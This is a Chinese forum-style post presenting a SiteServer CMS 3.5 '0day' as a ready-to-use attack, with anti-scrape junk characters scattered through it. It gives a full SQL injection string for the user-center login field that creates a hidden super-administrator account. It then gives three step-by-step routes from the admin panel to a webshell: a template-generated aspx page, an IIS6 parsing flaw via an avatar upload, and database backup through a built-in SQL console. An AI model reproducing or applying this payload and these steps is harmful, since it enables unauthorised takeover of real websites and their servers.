SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

9 f3 X4 H2 u# M) Kstieserver官网:www.siteserver.cn


& A1 k/ Z* W/ m- W% d/ S
9 c. v, O; \2 K7 p  q# q7 U7 FEXP:

* D" Z- x6 u- l直接访问UserCenter/login.aspx



  W& ^) L; m$ u: B( B, z' }3 @3 n: d用户名处输入：

$ T, S6 ?( x# l4 r123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--

5 j4 U" O- s5 v: t. }

密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
; q- e, h$ r7 L! H6 J2 u
- a, s/ z( T1 y7 z1 C, @, N$ M
& D) W& t) X1 _- _5 u: v2 T' x3 |
之后再访问后台SiteServer/login.aspx用插入的用户登陆
1 b" e6 x  d( S( d0 s


后台拿webshell的三种方法：
: }  Q/ |. T: c* q* N
一、
! t7 S1 d! `' X8 V
. o' W3 k) [% K$ q/ {站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、
/ ~0 q3 N8 B, ?1 w+ d
$ e) H' A* ^3 C: |2 [5 ~7 K成员权限-》添加用户-》用户名为：1.asp

5 _2 V  T  q% B' B6 d; ~http://127.0.0.1/usercenter/

用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
$ X% Y  s" ^) \# o8 u+ }
6 B, t2 v6 Z3 c6 R3 y（ps：后台添加用户时不会验证是否含有非法字符）

# j. S" J' u; p5 g* a' v5 f三、
* {2 F8 e; o  Z
3 v7 t( U- ?' N. m; C! T) q9 s系统工具-》实用工具-》机器参数查看
5 w2 h7 P8 z# q可以看到数据库类型、名称，WEB路径
: ]3 S( Q6 E  C. K% \
+ u7 E# `$ \) y: u- V- A系统工具-》数据库工具-》SQL语句查询
8 f# }. _7 U4 K- z" s! P! `这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
9 u# j- b. e  l/ B3 ~